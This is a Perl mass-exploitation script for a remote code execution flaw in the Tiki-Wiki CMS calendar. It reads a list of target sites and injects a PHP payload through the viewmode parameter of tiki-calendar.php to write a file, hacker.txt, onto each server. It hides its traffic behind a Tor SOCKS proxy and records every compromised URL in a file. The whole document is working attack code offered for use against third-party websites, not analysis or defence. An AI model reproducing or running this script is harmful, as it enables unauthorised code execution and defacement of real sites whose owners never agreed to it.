Tiki-Wiki CMS RCE

1. #!/usr/bin/perl
2. #                        ->Coder By CrashBandicot
3. #
4. #                    Tiki-Wiki CMS Calendar 14.2, 12.5 LTS, 9.11 LTS, and 6.15 - Remote Code Execution
5. #                     discovery by Dany Ouellet
6. #                    ref: https://www.exploit-db.com/exploits/39965/
7.  
8. use LWP::UserAgent;
9. use LWP::Protocol::socks;
10. use HTTP::Request::Common;
11.  
12. if ($^O =~ /Win/) { system("cls"); } else { system("clear"); }
13. print "
14.                  
15.               Tiki Mass Explo!ter RCE
16.               by CrashBandicot        
17.  
18.         Usage : $0 list.txt
19.  
20. \n";
21.  
22.  
23. open(tarrget,"<$ARGV[0]") or die "$!";
24. while(<tarrget>){
25. chomp($_);
26. $webs = $_;
27.  
28. print " [+] Scanning -> $webs";
29.  
30. $payload = '/tiki-calendar.php?viewmode=%27;%20$z=fopen(%22hacker.txt%22,%27w%27);%20fwrite($z,(%22by%20hacker%22));fclose($z);$a=%27';
31.  
32. $ua = LWP::UserAgent->new();
33. $ua->proxy([qw/ http https /] => 'socks://127.0.0.1:9150');
34. $ua->timeout(30);
35. $ua->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.1) Gecko/20090624 Firefox/3.5");
36. $fuck = $ua->get($webs.$payload);
37.  
38.  $def = $webs."/hacker.txt";
39.  
40.  $check = $ua->get($def)->content;
41.  if($check =~/hacker/) {
42.  
43.     print "\n\n  [+] File Uploaded >> $def\n";
44.  
45. open(save ,">>savetiki.txt");
46. print save "$def\n";
47. close save;
48.  
49.  
50.  } else {  print "\n [-] File Upload Fail\n";   }
51.  
52.  
53. }